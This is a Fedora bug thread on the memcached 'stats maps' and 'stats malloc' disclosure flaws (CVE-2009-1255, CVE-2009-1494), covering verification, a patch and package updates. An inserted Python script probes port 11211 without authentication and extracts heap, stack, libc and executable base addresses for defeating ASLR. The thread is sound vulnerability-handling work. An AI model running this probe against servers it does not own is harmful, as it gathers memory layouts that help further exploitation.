It was reported that memcached versions 1.2.0-1.2.7 contained a security weakness in the 'stats maps' command, where it displays stack, heap, and shared memory locations. In the event that a buffer overrun was ever discovered in memcached, the 'stats maps' command could be used to bypass address space layout randomization protection. As well, since memcached offers no authentication by default for its port, and thus for this command, a remote attacker could obtain this information easily if the administrator did not firewall or otherwise secure the memcached listening port.
memcached 1.2.8 has been released and removes the 'stats maps' command entirely.
SecurityFocus reference: http://www.securityfocus.com/bid/34756
I have verified this on Fedora 10; installing memcached and telnetting to port 11211 and issuing "stats maps" provides full information without any authentication required.
I have my CVS access back. I can prepare an updated version of memcached with 1.2.8 today.
Fantastic. Thanks for being so responsive. You will be preparing this for F9, F10, and F11 then?
I haven't kept up with the build system lately, but I see no reason why this couldn't happen on all three. F-9 is pegged at 1.2.5 for some reason, I think there was some problem with selinux that prevented moving forward. I'll see what I can do there.
rawhide, F-10, F-11 all built. F-10/F-11 submitted through bodhi.
Can someone tell me what it takes to get the update through testing and released? This is my first time addressing a security problem.
Hi, Paul. I'm not sure what the steps are on the Fedora side. I'm trying to find out for you (and for my enlightenment as well). Thanks.
Hi Paul. Ok, from what I'm hearing there is very little difference between a security or a non-security update for Fedora. There should be a way to mark it as a security fix (either via the web ui or via bodhi -t security). If you need more than that, please let me know (I've never built anything for Fedora or via bodhi so this is all new to me). Thanks.
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1255 to
the following vulnerability:
Reference: BUGTRAQ:20090428 Positron Security Advisory #2009-001: Memcached and MemcacheDB ASLR Bypass Weakness
Reference: URL: http://www.securityfocus.com/archive/1/archive/1/503064/100/0/threaded
Reference: MISC: http://www.positronsecurity.com/advisories/2009-001.html
Reference: CONFIRM: http://code.google.com/p/memcachedb/source/browse/trunk/ChangeLog?spec=svn98&r=98
Reference: CONFIRM: http://code.google.com/p/memcachedb/source/detail?r=98
Reference: CONFIRM: http://code.google.com/p/memcachedb/source/diff?spec=svn98&r=98&format=side&path=/trunk/memcachedb.c
Reference: CONFIRM: http://groups.google.com/group/memcached/browse_thread/thread/ff96a9b88fb5d40e
Reference: URL: http://www.securityfocus.com/bid/34756
Reference: URL: http://secunia.com/advisories/34915
Reference: URL: http://secunia.com/advisories/34932
Reference: URL: http://www.vupen.com/english/advisories/2009/1196
Reference: URL: http://www.vupen.com/english/advisories/2009/1197
The process_stat function in (1) Memcached before 1.2.8 and (2)
MemcacheDB 1.2.0 discloses (a) the contents of /proc/self/maps in
response to a stats maps command and (b) memory-allocation statistics
in response to a stats malloc command, which allows remote attackers
to obtain sensitive information such as the locations of memory
regions, and defeat ASLR protection, by sending a command to the
daemon's TCP port.
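The script below is an added example, not code from the memcached project or from anyone in this bug. It sends the two subcommands named in the CVE text to a memcached TCP port (no authentication is needed, as the report notes), parses what a vulnerable server answers with (raw /proc/self/maps lines for 'stats maps', STAT lines for 'stats malloc'), and pulls out the addresses an exploit writer would actually use: the executable, heap, stack and libc bases. The two sample replies embedded in it are constructed, with invented addresses. The ERROR/SERVER_ERROR handling assumes a server that no longer has a subcommand answers with one of those lines, which nothing in this report confirms, so read "refused" as "no disclosure observed" rather than "fixed".

```python
"""Probe memcached 'stats maps' / 'stats malloc' and parse the disclosure.
Added example; not memcached's own code."""
import re
import socket

# One /proc/self/maps line: start-end perms offset dev inode [path]
_MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+[0-9a-f]+\s+\S+\s+\d+\s*(.*)$"
)
_STAT_RE = re.compile(r"^STAT\s+(\S+)\s+(-?\d+)$")

# Constructed sample replies (addresses invented): a pre-1.2.8 server
# copies /proc/self/maps verbatim and appends END; 'stats malloc' uses
# the usual STAT lines.
SAMPLE_MAPS_REPLY = (
    "08048000-08060000 r-xp 00000000 08:01 12345      /usr/bin/memcached\n"
    "08060000-08061000 rw-p 00018000 08:01 12345      /usr/bin/memcached\n"
    "09a1c000-09b1c000 rw-p 00000000 00:00 0          [heap]\n"
    "b7e0a000-b7f4a000 r-xp 00000000 08:01 67890      /lib/libc-2.9.so\n"
    "bfc2a000-bfc3f000 rw-p 00000000 00:00 0          [stack]\n"
    "END\r\n"
)
SAMPLE_MALLOC_REPLY = (
    "STAT arena_size 921600\r\nSTAT free_chunks 3\r\n"
    "STAT total_alloc 813488\r\nEND\r\n"
)


def read_reply(sock, timeout=3.0, limit=1 << 20):
    """Read until the END/ERROR terminator, a timeout, or the size limit."""
    sock.settimeout(timeout)
    buf = b""
    while len(buf) < limit:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
        if buf.endswith(b"END\r\n") or buf.endswith(b"ERROR\r\n"):
            break
    return buf.decode("ascii", "replace")


def probe(host, port, subcommand):
    """Send 'stats <subcommand>' to a live server and return the raw reply."""
    with socket.create_connection((host, port), timeout=3.0) as s:
        s.sendall(f"stats {subcommand}\r\n".encode())
        return read_reply(s)


def parse_maps(reply):
    """Extract memory regions from raw /proc/self/maps lines in a reply."""
    regions = []
    for line in reply.splitlines():
        m = _MAPS_RE.match(line.strip())
        if m:
            regions.append({"start": int(m.group(1), 16),
                            "end": int(m.group(2), 16),
                            "perms": m.group(3),
                            "path": m.group(4).strip()})
    return regions


def parse_stats(reply):
    """Turn 'STAT name value' lines into a {name: int} dict."""
    out = {}
    for line in reply.splitlines():
        m = _STAT_RE.match(line.strip())
        if m:
            out[m.group(1)] = int(m.group(2))
    return out


def aslr_bases(regions):
    """What defeats ASLR: first executable mapping of the binary and of
    libc, plus the heap and stack bases.  Returns {name: base_address}."""
    bases = {}
    for r in regions:
        path, perms = r["path"], r["perms"]
        if path == "[heap]":
            bases.setdefault("heap", r["start"])
        elif path == "[stack]":
            bases.setdefault("stack", r["start"])
        elif "/libc" in path and "x" in perms:
            bases.setdefault("libc", r["start"])
        elif path.endswith("/memcached") and "x" in perms:
            bases.setdefault("exe", r["start"])
    return bases


def classify(reply):
    """'disclosed' if maps or STAT lines came back, 'refused' on an
    ERROR/SERVER_ERROR first line (assumed reply for a dropped subcommand),
    'unknown' otherwise (empty reply, timeout, unexpected text)."""
    if parse_maps(reply) or parse_stats(reply):
        return "disclosed"
    first = reply.strip().split("\r\n", 1)[0] if reply.strip() else ""
    if first.startswith("ERROR") or first.startswith("SERVER_ERROR"):
        return "refused"
    return "unknown"


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for sub in ("maps", "malloc"):
        reply = probe(host, 11211, sub)
        print(sub, classify(reply))
        if sub == "maps":
            print({k: hex(v) for k, v in aslr_bases(parse_maps(reply)).items()})
```

Run it as `python3 probe.py <host>` against a test instance you own; against a 1.2.7 server the maps probe should print "disclosed" and the libc/heap/stack bases, which is exactly the information an exploit for any later memory-corruption bug would otherwise have to guess.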
bodhi still shows this as pending.....
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1494 to
the following vulnerability:
Reference: MISC: http://code.google.com/p/memcachedb/source/detail?r=98
Reference: MISC: http://code.google.com/p/memcachedb/source/diff?spec=svn98&r=98&format=side&path=/trunk/memcachedb.c
Reference: MISC: http://groups.google.com/group/memcached/browse_thread/thread/ff96a9b88fb5d40e
Reference: MISC: http://memcached.googlecode.com/files/memcached-1.2.8.tar.gz
The process_stat function in Memcached 1.2.8 discloses
memory-allocation statistics in response to a stats malloc command,
which allows remote attackers to obtain potentially sensitive
information by sending this command to the daemon's TCP port.
NOTE: the above description is wrong. This is fixed in memcachedb 1.2.0, but not in memcached 1.2.8, so this actually affects memcached <= 1.2.8 (just verified by compiling new memcached 1.2.8 and running it locally). The 'stats malloc' command most definitely works:
% rpm -q memcached
% memcached -h | head -1
% telnet localhost 11211
Connected to localhost.
Escape character is '^]'.
STAT arena_size 921600
STAT free_chunks 3
STAT fastbin_blocks 0
STAT mmapped_regions 1
STAT mmapped_space 528384
STAT max_total_alloc 0
STAT fastbin_space 0
STAT total_alloc 813488
STAT total_free 108112
STAT releasable_space 107952
I came up with a quick patch to remove the 'stats malloc' command entirely. I'll attach it in a moment. We may want to include that in our updated packages.
Created attachment 342133 [details]
patch to fix CVE-2009-1494
This patch removes the 'stats malloc' command.
Hi, Paul. You may want to replace those packages in bodhi with a new one with the patch I attached to fix the second information disclosure issue. I don't necessarily think there is anything there that is security-sensitive, but it was removed in memcachedb at the same time as the stats maps command, and a CVE name was assigned. At any rate, I don't think it will hurt to remove it.
I'm also not sure, having never used bodhi myself, but maybe you need to flag this as security when you submit it? I'm not sure. Sorry I'm not much more help with that.
(In reply to comment #9)
> bodhi still shows this as pending.....
Pending means that the update is waiting for Fedora rel-eng to sign packages and push update to testing / stable as you requested.
memcached-1.2.8-1.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.
memcached-1.2.8-1.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.